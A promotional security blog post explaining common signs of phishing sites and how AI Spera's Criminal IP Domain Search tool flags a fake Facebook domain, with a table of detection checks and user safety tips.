From the past, attackers have long been employing malicious methods to set up phishing sites disguising as famous sites and steal personal financial information via emails, SMS and online community boards. According to Verizon’s ’21 Data Breach Investigation Report’, it was found that 36% of breaches were associated with phishing, which is an indicator of how much phishing tactics account for in security breaches.
Below are some classic examples of attempted phishing that anyone could experience.
- Use of origins that are seemingly similar to reputable and famous companies
- Absence of normal signature block in web browser address bar
- Incorrect grammar, sentence, spelling error, and inconsistent content
- Strongly urging file downloads and link through expressions stressing a false sense of urgency and importance
AI Spera’s Criminal IP (CIP) Domain Search feature allows you to reduce potential damage by determining whether a phishing site exists and diagnosing whether its domain is benign or malicious.
If you are a security manager, you may already be familiar with your company employees reporting receipt of fishy messages illustrated below.
After the report has been filed, you must quickly block the domain in question and follow through with measures that are built on in-depth analysis in order to preempt further damage.
After analyzing the domain through Domain Search, its score was confirmed as standing at a critical level. It was already mentioned in the analysis summary that the suspicious length property has a length of more than 30 characters and there is an iframe tag that is commonly used for inserting malicious codes.
Also, seeing that the title, favicon, screenshot, inserted, and Redirect to paths are different from normal Facebook, it is quite evident that the domain is a phishing site.
AI Spera provides an expository feature summary such as shown in the table below to make it easier for security managers using Domain Search to understand analysis results of phishing sites.
|Common||URL with IP||Check whether the detected domain or link is with IP address|
|Fake Domain||Check domain similarity with Top sites|
|Fake SSL||Check certificatge validity|
|MITM Attack||Check possibilities of MITM attacks|
|Locations||Check the country diversity of IP associated with the domain|
|Newborn Domain||Check domain creation time|
|Suspicious Length||Check whether the domain name length is abnormal|
|Abuse Record||Check whether any IP scored as Critical or Dangerous is included|
|Mail Server||Check whether mail server exists|
|SPF1 Result||Check the query results of the domain|
|DGA Score||Check the existence of irregular character strings|
|HTML||Hidden Element||Check hidden elements in html|
|Hidden Iframe||Check hidden iframes in html|
|Iframe||Check whether iframe exists|
|Suspiciouis HTML Element||Check suspicious objects in html|
|Suspicious Program||Check the installation files downloadable within html|
|Button Trap||Check entirely different domain calls with Button event|
|Credential Input Form||Check redirection of authentication information within html|
|Network||Redirection to another AS||Check other AS upon redirection|
|Redirection to another country||Check other countires upon redirection|
|Redirection to another domain||Check other domains upon redirection|
|Suspicious Cookie||Check validity of domain cookies|
Furthermore, since many phishing sites do not have a normal signature block applied to them,
there are many cases where fraudulent websites are flagged through alert messages on the web browser address bar and built-in filter features of the web browser.
If it is not a random website set up by companies purely for testing purposes, it is recommendable to treat it as a phishing site if you come across warnings such as below.
In order to avert potential damage caused by phishing sites, it is necessary to keep the following guidelines in mind and act accordingly.
- Messages and links from unknown origins should be deleted immediately.
- Do not click when you cannot verify the electronic signature or when similar domains and sender information are used
- Enable all anti-phishing features provided by mobile, email clients and web browsers.
- Activate multi-factor authentication for all accounts as much as possible.
- Use CIP Domain Search to obtain data-driven analysis results and respond quickly.
This article was written by drawing on data provided by Criminal IP. If you are keen to find out more about specific Criminal IP services as well as beta tester recruitment, feel free to head over to our LANDING PAGE that is NOW open!